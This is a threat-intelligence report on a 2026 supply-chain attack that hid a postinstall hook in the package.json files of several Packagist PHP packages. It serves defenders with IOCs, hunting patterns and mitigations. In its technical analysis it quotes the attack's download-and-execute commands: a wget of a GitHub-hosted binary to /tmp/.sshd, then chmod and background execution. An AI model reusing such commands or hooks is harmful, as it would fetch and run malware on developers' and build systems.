Coordinated Packagist Attack Infects PHP Projects with Linux Malware

Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware

HIGH
May 23, 2026
5m read
Supply Chain AttackMalwareCloud Security

Related Entities

Organizations

Packagist

Products & Tech

PHPLinux

Other

GitHub

MITRE ATT&CK Techniques

T1195.001

Compromise Software Dependencies and Development Tools

T1059.004

Unix Shell

T1105

Ingress Tool Transfer

T1027

Obfuscated Files or Information

Full Report

Executive Summary

Security researchers have uncovered a coordinated supply chain attack targeting at least eight PHP packages on the Packagist repository. The attackers modified the upstream repositories of these packages to include a malicious postinstall script. This script was designed to download a Linux binary from a GitHub Releases URL and execute it on the compromised system. The attack is notable for its 'cross-ecosystem' evasion tactic: the malicious hook was placed in the package.json file, commonly associated with the npm/JavaScript ecosystem, rather than the PHP-specific composer.json. This made the payload difficult to detect for security tools and developers focused solely on PHP configurations. The Packagist team has removed the malicious package versions.

Threat Overview

This attack highlights an increasing trend of threat actors leveraging multi-ecosystem features within a single software package to hide their activities.

  • What Happened: At least eight PHP packages on Packagist were compromised to download and execute a Linux ELF binary.
  • Attack Vector: Modification of the package.json file within a PHP project to add a malicious postinstall script.
  • Payload: A Linux binary downloaded from GitHub and executed from the /tmp/.sshd directory.
  • Evasion Tactic: By using package.json, the attackers bypassed security scanners and developer scrutiny focused on composer.json, the standard for PHP dependency management.

Technical Analysis

The attack chain was simple but effective:

  1. Compromise: The threat actor gained access to the source repositories of several PHP packages, including:

    • moritz-sauer-13/silverstripe-cms-theme
    • crosiersource/crosierlib-base
    • devdojo/wave
    • devdojo/genesis

  2. Injection: The attacker modified the package.json file in these repositories, adding a postinstall script. This script is automatically executed by package managers like npm or yarn after a package is installed. This is an instance of T1195.001 - Compromise Software Dependencies and Development Tools.

  3. Execution: The postinstall script would perform the following actions, a classic use of T1059.004 - Unix Shell:

    wget https://github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/download/v3.1.2/patch -O /tmp/.sshd
chmod +x /tmp/.sshd
/tmp/.sshd &

    This sequence downloads the malicious binary (T1105 - Ingress Tool Transfer), makes it executable, and runs it in the background.

  4. Payload: The nature of the Linux binary patch (saved as .sshd) was not detailed in the reports, but its execution from /tmp suggests a generic backdoor or cryptominer.

Impact Assessment

Any developer or CI/CD system that installed one of the compromised PHP packages and also ran npm install or yarn install as part of their build process would be affected. This would lead to the execution of the malicious Linux binary on their system. The impact depends on the payload of the binary but could range from credential theft and data exfiltration to the system being used for cryptocurrency mining or as part of a botnet. The attack demonstrates a significant gap in security scanning that focuses on a single package ecosystem, ignoring the hybrid nature of modern web development projects.

IOCs — Directly from Articles

Type
URL
Value
github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f
Description
The GitHub repository hosting the malicious Linux binary.
Type
File Path
Value
/tmp/.sshd
Description
The location where the malicious binary is saved and executed from.

Cyber Observables — Hunting Hints

Security teams should hunt for these patterns in their development and production environments:

Type
File Name
Value
package.json
Description
In PHP projects, the presence of a postinstall script in this file is highly anomalous and warrants immediate investigation.
Type
Network Traffic Pattern
Value
Outbound connections to github.com from a build server
Description
Specifically, look for wget or curl commands downloading release assets from unknown or suspicious repositories.
Type
Process Name
Value
.sshd
Description
The execution of a process with this name from the /tmp directory is a definitive indicator of compromise.
Type
Command Line Pattern
Value
chmod +x /tmp/*
Description
A command making a file in the temporary directory executable is a common step in malware execution chains.

Detection & Response

  1. Audit package.json: Immediately audit all PHP projects for the presence of package.json files. If found, inspect them for any preinstall, install, or postinstall scripts.
  2. Scan for IOCs: Scan Linux systems (developer workstations, build servers, web servers) for the presence of the /tmp/.sshd file and for any network logs showing connections to the malicious GitHub URL.
  3. Review Build Processes: Analyze your CI/CD pipeline and local development setup. Understand if and when npm install is run alongside composer install. If it is, ensure that the security tools you use can analyze both composer.json and package.json.
  4. Isolate and Rebuild: If a compromised system is found, it should be isolated from the network and rebuilt from a known-good state.

Mitigation

  1. Comprehensive Scanners: Use security scanners that understand and analyze multi-ecosystem projects. Your dependency scanner should inspect package.json, composer.json, Gemfile, etc., within the same project.
  2. Restrict Build Environments: Build environments should be ephemeral and have their network access restricted. Outbound connections should be denied by default and only allowed to trusted repositories through a proxy.
  3. Disable Scripts: If not required, run package manager installations with flags that disable scripts (e.g., npm install --ignore-scripts). This can prevent malicious hooks from executing but may break legitimate packages that rely on them.
  4. Principle of Least Privilege: Ensure your build processes run with the minimum necessary permissions. They should not have write access to unexpected parts of the filesystem or the ability to install new software.

Timeline of Events

1
May 23, 2026
This article was published

MITRE ATT&CK Mitigations

Execution Prevention

M1038enterprise

Run package manager installations with flags to disable execution of arbitrary scripts (e.g., 'npm install --ignore-scripts'), which would prevent the malicious 'postinstall' hook from running.

Application Isolation and Sandboxing

M1048enterprise

Run build processes in tightly controlled, sandboxed environments with no outbound network access to prevent the downloading of malicious payloads.

Audit

M1047enterprise

Implement security tooling that can audit all dependency manifests in a project (package.json, composer.json, etc.) for suspicious scripts or dependencies.

D3FEND Defensive Countermeasures

Dynamic Analysis

D3-DAMaps to MITREM1048
D3FEND

To counter this cross-ecosystem attack, security checks must analyze the behavior of the entire build process, not just one part of it. Integrate a dynamic analysis sandbox into your CI/CD pipeline. After composer install and npm install are run, the sandbox should monitor for suspicious activities. In this case, it would have detected the postinstall script attempting to use wget to make an outbound network connection to GitHub, download a file to /tmp, and then make it executable with chmod. These are all highly suspicious behaviors for a package installation script. A policy to fail the build upon such activity would have prevented the compromise.

System File Analysis

D3-SFAMaps to MITREM1047
D3FEND

Developers and security tools often focus on composer.json in PHP projects, which is the exact blind spot this attack exploited. Security practices must evolve to be 'holistic' for modern polyglot applications. Implement static analysis tools or pre-commit hooks that specifically search for and flag the presence of preinstall, install, or postinstall scripts within package.json files in your PHP projects. While these scripts can be legitimate, their presence in a project that is not primarily JavaScript-based is an anomaly that should require manual review and justification. This simple static check can serve as a powerful tripwire for this type of evasion tactic.

Network Isolation

D3-NIMaps to MITREM1037
D3FEND

The attack's success was contingent on the build environment having unrestricted outbound internet access to download the Linux binary from GitHub. To mitigate this, build servers and CI/CD runners should be placed in a network-isolated environment with a default-deny egress policy. All access to external resources, including package registries and source code repositories, should be routed through a controlled and monitored proxy. This would have blocked the wget command from reaching github.com and downloading the payload, breaking the attack chain regardless of the malicious script in package.json.

Sources & References

Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
The Hacker News (thehackernews.com)
Coordinated Supply Chain Attack Hits Packagist
Socket (socket.dev)

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

PackagistPHPSupply Chain AttackLinuxpackage.json

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.